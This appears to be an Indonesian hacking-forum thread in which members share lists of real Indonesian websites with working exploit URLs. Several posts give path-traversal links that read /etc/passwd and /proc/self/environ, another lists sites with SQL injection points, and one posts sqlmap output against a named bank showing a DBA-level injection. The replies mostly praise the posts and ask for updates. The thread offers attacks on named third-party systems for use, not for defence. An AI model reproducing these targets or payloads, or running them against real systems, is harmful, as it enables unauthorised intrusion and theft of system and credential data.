Forum untuk membahas semua tentang web hacking mulai dari footprint, scanning, gain access, escalate previlege, exploit,cover track, backdoors sampai mengamankan web
Moderators: Paman, Xshadow, indounderground, NeOS-01
Forum rules
Membahas bugs,penetrasi, eksploitasi dan teknik mengamankan website - websrver. Sertakan POC disini agar member dapat mempelajarinya
-
j0ck3r
- Posts: 331
- Joined: Wed Jun 02, 2010 4:51 pm
- Location: diantara kedamaian dunia underground
-
Contact:
Post
by j0ck3r » Tue Jan 22, 2013 7:05 pm
Beberapa bug's LFI
Code: Select all
http://www.tumbletots.co.id/parentsandtots.php?ID=../../../../../../../../../../../../proc/self/environ
www.dayadimensi.co.id/include/download5.php?pdf=../../../../../etc/passwd
www.kasindo.co.id/downlot.php?support&file=../../../../../../../../../../../../../etc/passwd
www.unisri.ac.id/unduh.php?f=../../../../../../../../../../etc/passwd
http://www.smkbni.sch.id/downlot.php?file=../../../../../../../../../../../../../proc/self/environ
Biarkan mereka tidak mengerti apa-apa.Biarkan mereka bilang saya kurang pergaulan atau introvert.Peduli apa saya dengan mereka?Inilah duniaku.Dunia yang tersusun dari angka 0 dan 1.
My Blog
Add Me
-
poni
- Posts: 1666
- Joined: Mon Dec 05, 2005 10:44 am
- Location: Indonesia
-
Contact:
Post
by poni » Mon Jan 28, 2013 9:04 pm
mantab pak j0ck3r..
.::...Cr3ditz......::....
join us :
www.xcode.or.id - 001101
"@ b3tt3r d1g1t4l w0rlD" -- 010110000110001001
-
andyfahri
- Posts: 2
- Joined: Wed Mar 06, 2013 8:18 pm
Post
by andyfahri » Tue Mar 12, 2013 8:55 pm
wah nice shared plz
-
j0ck3r
- Posts: 331
- Joined: Wed Jun 02, 2010 4:51 pm
- Location: diantara kedamaian dunia underground
-
Contact:
Post
by j0ck3r » Mon Apr 14, 2014 3:58 pm
Code: Select all
http://www.audiocentre.co.id/category.php?sub=75'
http://www.indii.co.id/list_news.php?id_ref_menu=107'
http://www.k-link.co.id/news.php?cat=Check'
http://www.indopelita.co.id/article.php?id=78&p=news'
http://plazafestival.co.id/content.php?id=127&mn=106&mnsb=11'
http://radila.co.id/content.php?cat=1'
http://www.jamsostek.co.id/content/ajaxcontent.php?id=11'
http://techscape.co.id/market/stats/template.php?a=t_max'
http://www.gree.co.id/products_detail.php?id=4'
http://www.netmarks.co.id/news_view.php?id=20'
http://www.generallaju.co.id/home.php?page=details&prod=18&cat=16&group=12'
Biarkan mereka tidak mengerti apa-apa.Biarkan mereka bilang saya kurang pergaulan atau introvert.Peduli apa saya dengan mereka?Inilah duniaku.Dunia yang tersusun dari angka 0 dan 1.
My Blog
Add Me
-
cahmetro
- Posts: 2
- Joined: Tue Jun 07, 2016 4:58 am
Post
by cahmetro » Tue Jun 07, 2016 12:15 pm
Target : http://www.bankmandiri.co.id/
Akses terakhir : 20 Mei 2016
Patch : Yes
Penggalan log :
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2005
sqlmap resumed the following injection point(s) from stored session:
---
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Type: UNION query
Title: Generic UNION query (NULL) - 8 columns
banner:
---
Microsoft SQL Server 2005 - 9.00.4035.00 (Intel X86)
Nov 24 2008 13:01:59
Copyright (c) 1988-2005 Microsoft Corporation
Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
---
current user: 'mdr***'
current database: 'mandiri***'
hostname: '****DB'
current user is DBA: True
database management system users [5]:
-
UNDOTZ
- Posts: 1
- Joined: Thu May 19, 2016 5:52 am
Post
by UNDOTZ » Thu Nov 17, 2016 4:26 am
web lokal suka rese dan hujat orang ni bro...
-
gprakasa
- Posts: 25
- Joined: Tue Jan 24, 2017 10:55 am
Post
by gprakasa » Wed Jan 25, 2017 10:36 am
ditunggu updateannya gan
